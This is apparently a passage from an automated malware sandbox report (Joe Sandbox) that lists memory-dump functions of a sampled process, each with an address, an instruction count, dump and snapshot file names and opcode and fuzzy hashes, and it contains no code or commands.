                                                                                                                                  • Instruction Fuzzy Hash: 5DE04F2154F3C04FC70B973088A88803F60DE2721034A40EAC145CF2B3E5298C49C711
                                                                                                                                  Function 00007FFD9BADE339 Relevance: .0, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 766aa0ce932918cdde308f6c22499ebc45b7553adf3843164fdbfc272c49b119
                                                                                                                                  • Instruction ID: 7a5d4e4c5c284cae1d0a98378bbaddce979002e6a2a82d53d0b2d228632deb92
                                                                                                                                  • Opcode Fuzzy Hash: 766aa0ce932918cdde308f6c22499ebc45b7553adf3843164fdbfc272c49b119
                                                                                                                                  • Instruction Fuzzy Hash: 23E0462294F3C44FC70B9B3088A88803F60DE6B21038A40EAC185CF2B3EA298C49C712
                                                                                                                                  Function 00007FFD9BAC55EE Relevance: .0, Instructions: 20COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b292142cf82a915c0d3309af083262191a7af86752a03255b8b08ca59009f910
                                                                                                                                  • Instruction ID: 4d42b7d0be3b109485a70965e459ddfeee3832af35be1ad3ca96cb3282065b1d
                                                                                                                                  • Opcode Fuzzy Hash: b292142cf82a915c0d3309af083262191a7af86752a03255b8b08ca59009f910
                                                                                                                                  • Instruction Fuzzy Hash: FAD0121271E86D4AB1A8B2EC38622FC93C2EBCC135B5953F7E11CC63DADC4A598302C5
                                                                                                                                  Function 00007FFD9BAD2AA0 Relevance: .0, Instructions: 18COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                                  Function 00007FFD9BADC678 Relevance: .0, Instructions: 17COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c6f8a706cbd772b155944279ffe8a3f2cffa48fa2b7bee167bf78b64a5f12c82
                                                                                                                                  • Instruction ID: b32eab7c9bc4b7e74645761e53194022764afd2861dcc3217c0a303523c631e1
                                                                                                                                  • Opcode Fuzzy Hash: c6f8a706cbd772b155944279ffe8a3f2cffa48fa2b7bee167bf78b64a5f12c82
                                                                                                                                  • Instruction Fuzzy Hash: 07D02230B508040FCB0CA738885C8303390EBAA20278600A8D00AC73B1D96ADC88CB80
                                                                                                                                  Function 00007FFD9BAB4080 Relevance: .0, Instructions: 16COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6c041862a73e2b6de475868b410abd7f4c78647bddf8e74da7c7540c1417e78f
                                                                                                                                  • Instruction ID: 581286378855cb50aceae6a2764fc65d1805fc2fadc41a54a20cd815604572da
                                                                                                                                  • Opcode Fuzzy Hash: 6c041862a73e2b6de475868b410abd7f4c78647bddf8e74da7c7540c1417e78f
                                                                                                                                  • Instruction Fuzzy Hash: 81E08C32E0440E4BEB18EF88C460AFD3BF5AF48304F00013AE029E62E5DE7428814B00
                                                                                                                                  Function 00007FFD9BAB47C5 Relevance: .0, Instructions: 14COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d34d9375b611b996318a395ba4af66737237af83ea357c991f98737d4e71250a
                                                                                                                                  • Instruction ID: 693cc6325eff473f90e08535aeacc7b152b97be437aed018cb3775b3459b9de1
                                                                                                                                  • Opcode Fuzzy Hash: d34d9375b611b996318a395ba4af66737237af83ea357c991f98737d4e71250a
                                                                                                                                  • Instruction Fuzzy Hash: DDD0A730F0881F4BE659EF48946426A6251FF44300F120039D81DC3167DE34E9118A40
                                                                                                                                  Function 00007FFD9BAA0B18 Relevance: .0, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction ID: 39ae7c3307a973fb3895cf3b728150e803e3f5b97c6d35a82a3f5e8e7e55929d
                                                                                                                                  • Opcode Fuzzy Hash: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction Fuzzy Hash: 7FC04C305218098FC994E76DC98595477A0FB0D215BD60190E44DC7171E65AADD5C741
                                                                                                                                  Function 00007FFD9BAA12E8 Relevance: .0, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction ID: 15a2d76f2acc1e229c8467994c8db05a7fe7b6cb91a23be4982a98db52c93475
                                                                                                                                  • Opcode Fuzzy Hash: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction Fuzzy Hash: 5BC08C3051180D8FCA48EB28C88481433E0FB0D200FC20090E008C7170E269DCC0CB40
                                                                                                                                  Function 00007FFD9BAC5A90 Relevance: .0, Instructions: 11COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction ID: bdd98c863e0162ae75f8e14699de8453af00b9b37c7f4702c9b7186f81107286
                                                                                                                                  • Opcode Fuzzy Hash: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction Fuzzy Hash: 64C092306118088FCA44FB7DC88994037E0FB0E205BC50080E40CCB270E26A9C96CB41
                                                                                                                                  Function 00007FFD9BAA460A Relevance: .0, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3a3e8aa6ac049f9ab4affdaf1cef375ae450392219bab8c7e838fde8bb1c81ad
                                                                                                                                  • Instruction ID: fb392f906a8bd58f36e87ef8285675534f6b388b9797f3ebc5245ee8eb12ad42
                                                                                                                                  • Opcode Fuzzy Hash: 3a3e8aa6ac049f9ab4affdaf1cef375ae450392219bab8c7e838fde8bb1c81ad
                                                                                                                                  • Instruction Fuzzy Hash: 0FC04C41F5D85A16F25A66144521A7D04535F5471CF990578F51EC72CECE5C5A0242C6
                                                                                                                                  Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction ID: ed2ad82ac794e93c54508d1dd081e88639fcab4bd9146968243794078dba2c1c
                                                                                                                                  • Opcode Fuzzy Hash: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction Fuzzy Hash: 2BB01200D5740F00E47433FA08A206870415B44200FC20070D40C8019198CE22980277
                                                                                                                                  Function 00007FFD9BAB9595 Relevance: .0, Instructions: 6COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c4335748156f765de31ba137da35eda4b86e70c92f16d18bbbf842374232bb6d
                                                                                                                                  • Instruction ID: e3ef123d9a2e456fd85f6baed8a656f05d0499f799ba2a21d6a2caedea0dda8f
                                                                                                                                  • Opcode Fuzzy Hash: c4335748156f765de31ba137da35eda4b86e70c92f16d18bbbf842374232bb6d
                                                                                                                                  • Instruction Fuzzy Hash: E4B09224A0911A8BE7209B8084303AA22429B44310F224431A82D832DBDBA8A90086A1
                                                                                                                                  Function 00007FFD9BAC9573 Relevance: .0, Instructions: 6COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b240fb7568091d689ab8c5492b25a547c9e87b0a5214af4b58355cb12027d448
                                                                                                                                  • Instruction ID: 2c7b4a09b520b846359eff5d391d97c43440ac16f2009f576705511ffd0f5ac4
                                                                                                                                  • Opcode Fuzzy Hash: b240fb7568091d689ab8c5492b25a547c9e87b0a5214af4b58355cb12027d448
                                                                                                                                  • Instruction Fuzzy Hash: F1A00218B4640E01D41D21A65CDE4E07361579E161FCA20A0C5094516098DF2ADB0241